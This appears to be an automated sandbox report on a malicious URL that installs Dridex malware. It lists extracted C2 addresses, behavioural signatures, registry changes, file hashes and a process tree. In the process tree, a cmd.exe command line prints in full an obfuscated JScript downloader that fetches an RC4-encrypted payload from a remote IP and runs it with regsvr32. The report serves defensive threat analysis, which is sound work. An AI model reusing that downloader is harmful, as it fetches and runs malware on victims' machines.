Overview

Task        Score  Sample                   Platform
Static      10
URLScan     -
Behavioral  -      https://ankltraffice...  windows7_x64
Behavioral  6      https://ankltraffice...  windows7_x64
Behavioral  1      https://ankltraffice...  windows7_x64
Behavioral  1      https://ankltraffice...  windows7_x64
Behavioral  1      https://ankltraffice...  windows10_x64
Behavioral  10     https://ankltraffice...  windows10_x64
Behavioral  10     https://ankltraffice...  windows10_x64
Behavioral  10     https://ankltraffice...  windows10_x64
Behavioral  10     https://ankltraffice...  windows10_x64
Analysis
- max time kernel: 135s
- max time network: 152s
- platform: windows10_x64
- resource: win10-en
- submitted: 10-09-2021 00:52
Tasks
- Static task static1
- URLScan task urlscan1
- Behavioral task behavioral1: sample https://ankltrafficexit.xyz/trafficexit, resource win7-jp
- Behavioral task behavioral2: sample https://ankltrafficexit.xyz/trafficexit, resource win7-fr
- Behavioral task behavioral3: sample https://ankltrafficexit.xyz/trafficexit, resource win7v20210408
- Behavioral task behavioral4: sample https://ankltrafficexit.xyz/trafficexit, resource win7-de
- Behavioral task behavioral5: sample https://ankltrafficexit.xyz/trafficexit, resource win10v20210408
- Behavioral task behavioral6: sample https://ankltrafficexit.xyz/trafficexit, resource win10-jp
- Behavioral task behavioral7: sample https://ankltrafficexit.xyz/trafficexit, resource win10-fr
- Behavioral task behavioral8: sample https://ankltrafficexit.xyz/trafficexit, resource win10-en
- Behavioral task behavioral9: sample https://ankltrafficexit.xyz/trafficexit, resource win10-de
General

Malware Config (extracted)
- Family: dridex
- Botnet: 10111
- C2:
  - 104.152.111.198:9676
  - 92.247.29.75:10172
  - 133.242.136.130:8194
Signatures

- Blocklisted process makes network request (1 IoCs)
  Processes (flow, pid, process):
  - 26, 3092, wscript.exe

- Executes dropped EXE (1 IoCs)
  Processes (pid, process):
  - 4080, mgbzb.exe

- Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.

- Checks whether UAC is enabled
  Processes (description, ioc, process):
  - Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (mgbzb.exe)

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Modifies Internet Explorer settings
  Processes (process: description, ioc):
  - IEXPLORE.EXE: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30909918"
  - iexplore.exe: Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames
  - iexplore.exe: Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki
  - iexplore.exe: Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/
  - iexplore.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511"
  - iexplore.exe: Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main
  - iexplore.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"
  - iexplore.exe: Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000
  - iexplore.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"
  - IEXPLORE.EXE: Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main
  - iexplore.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3255464718"
  - iexplore.exe: Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent
  - iexplore.exe: Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive
  - IEXPLORE.EXE: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30909918"
  - iexplore.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30909918"
  - iexplore.exe: Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3
  - iexplore.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "338016942"
  - iexplore.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{E329BF61-11D1-11EC-A248-6E4370BFA843} = "0"
  - iexplore.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"
  - IEXPLORE.EXE: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3120777136"
  - iexplore.exe: Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead
  - iexplore.exe: Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz!
  - iexplore.exe: Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
  - IEXPLORE.EXE: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"
  - IEXPLORE.EXE: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3120933669"
  - iexplore.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30909918"
  - iexplore.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"
  - iexplore.exe: Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4
  - iexplore.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"
  - IEXPLORE.EXE: Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager
  - iexplore.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3255464718"
  - iexplore.exe: Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\
  - iexplore.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "338048933"
  - IEXPLORE.EXE: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"
  - iexplore.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "338000348"
  - iexplore.exe: Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger
  - iexplore.exe: Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch
  - iexplore.exe: Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\VersionManager
  - iexplore.exe: Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion
  - iexplore.exe: Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta
  - iexplore.exe: Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress
  - iexplore.exe: Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate

- Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  Processes (pid, process):
  - 3808, iexplore.exe

- Suspicious use of FindShellTrayWindow (1 IoCs)
  Processes (pid, process):
  - 3808, iexplore.exe

- Suspicious use of SetWindowsHookEx (6 IoCs)
  Processes (pid, process):
  - 3808, iexplore.exe
  - 3808, iexplore.exe
  - 1384, IEXPLORE.EXE
  - 1384, IEXPLORE.EXE
  - 1384, IEXPLORE.EXE
  - 1384, IEXPLORE.EXE

- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes (description, pid, process, target process):
  - PID 3808 wrote to memory of 1384: iexplore.exe -> IEXPLORE.EXE (3 entries)
  - PID 1384 wrote to memory of 2996: IEXPLORE.EXE -> cmd.exe (3 entries)
  - PID 2996 wrote to memory of 3092: cmd.exe -> wscript.exe (3 entries)
  - PID 3092 wrote to memory of 2728: wscript.exe -> cmd.exe (3 entries)
  - PID 2728 wrote to memory of 4080: cmd.exe -> mgbzb.exe (3 entries)
Processes (each entry is a child of the one above it; the number is the depth in the process tree)

1. C:\Program Files\Internet Explorer\iexplore.exe
   Command line: "C:\Program Files\Internet Explorer\iexplore.exe" https://ankltrafficexit.xyz/trafficexit
   - Modifies Internet Explorer settings
   - Suspicious behavior: GetForegroundWindowSpam
   - Suspicious use of FindShellTrayWindow
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory

2. C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
   Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3808 CREDAT:82945 /prefetch:2
   - Modifies Internet Explorer settings
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory

3. C:\Windows\SysWOW64\cmd.exe
   Command line: cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NDc2NTc3&FwZgo&dsfdffg43t=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7LPRAOzrlyCelTVo_AsJONUPQDn2UaIfgdpydxdAFsR8_2piUDQzUKU05bT9UaIUQlG-aLIVLA46A&cxssdvxcv=110mpinny.93an92.406p2g8u8&sdfsdfdfg=twix&ogfgafgn4=w3_QMvXcJx7QFYPJKfrcT&fhfghddfsdf=diet&qWOMaFdXKMjE0Mjg=" "2"
   - Suspicious use of WriteProcessMemory

4. C:\Windows\SysWOW64\wscript.exe
   Command line: wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NDc2NTc3&FwZgo&dsfdffg43t=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7LPRAOzrlyCelTVo_AsJONUPQDn2UaIfgdpydxdAFsR8_2piUDQzUKU05bT9UaIUQlG-aLIVLA46A&cxssdvxcv=110mpinny.93an92.406p2g8u8&sdfsdfdfg=twix&ogfgafgn4=w3_QMvXcJx7QFYPJKfrcT&fhfghddfsdf=diet&qWOMaFdXKMjE0Mjg=" "2"
   - Blocklisted process makes network request
   - Suspicious use of WriteProcessMemory

5. C:\Windows\SysWOW64\cmd.exe
   Command line: "C:\Windows\System32\cmd.exe" /c mgbzb.exe
   - Suspicious use of WriteProcessMemory

6. C:\Users\Admin\AppData\Local\Temp\mgbzb.exe
   Command line: mgbzb.exe
   - Executes dropped EXE
   - Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\AX9VL96L.cookie
  MD5: 1f403453c8c06f592ef85359cf8ea515
  SHA1: 149510271bb735493648f48063b1f4b41e82c6b0
  SHA256: f5d9f42581ec5d3e2ebe4b11d7e378df3531b24c6a7391bcbdf3504ecc882ba3
  SHA512: cc26499c5c36f793967d4f9bca2253e638a5c384f28cbfcd5b3881a8a8007c8971452c6159f890aa33191b8d8ca217cc75dca892029ad92985308c23dc9a51d1

- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\KH5DLZTJ.cookie
  MD5: 67fb146c5b5deec4419b893b40508d85
  SHA1: 5915e27de1f97f5e77339ce61ddd401e5a847840
  SHA256: 323e48286be512fd8b4d492e2012170a7904488469610de19d1ecdbbd9ea09e6
  SHA512: 5712417ffc5f0de6474480d488b665196a3e098f09f661a36360b736a934ecc106c1f4fb73ff21b40b882a9a7536d99c9c0db8adcbca9de54b58299af6238536

- C:\Users\Admin\AppData\Local\Temp\3.tMp
  MD5: 60fc00422b399db85f87d41b8328976d
  SHA1: bb85034acad8025f97e5bb236443debaf8926e4b
  SHA256: c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
  SHA512: 16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

- C:\Users\Admin\AppData\Local\Temp\mgbzb.exe
  MD5: 223dc24b1075564c200030321e21ee09
  SHA1: 76fdfb19ae4f9de19f5c039c16fd519a5f96027f
  SHA256: 9ba5eb35f3869aaba5be3c0dc7bc64ff2de408c3679c13f0b84733da0a78a280
  SHA512: 29f073141709ff88d050282ebffd1d6ad9278068ff78e37537b26e88063664f7d6652abcd15666e3d53d8ef2ef9fb75b59eae0febc1f760a5e73aae3e71c9277
Memory dumps

- memory/1384-116-0x0000000000000000-mapping.dmp
- memory/2728-120-0x0000000000000000-mapping.dmp
- memory/2996-117-0x0000000000000000-mapping.dmp
- memory/3092-118-0x0000000000000000-mapping.dmp
- memory/3808-115-0x00007FFCAE9E0000-0x00007FFCAEA4B000-memory.dmp
  Filesize: 428KB
- memory/4080-121-0x0000000000000000-mapping.dmp
- memory/4080-125-0x0000000000400000-0x000000000051A000-memory.dmp
  Filesize: 1.1MB
- memory/4080-124-0x00000000005B0000-0x00000000006FA000-memory.dmp
  Filesize: 1.3MB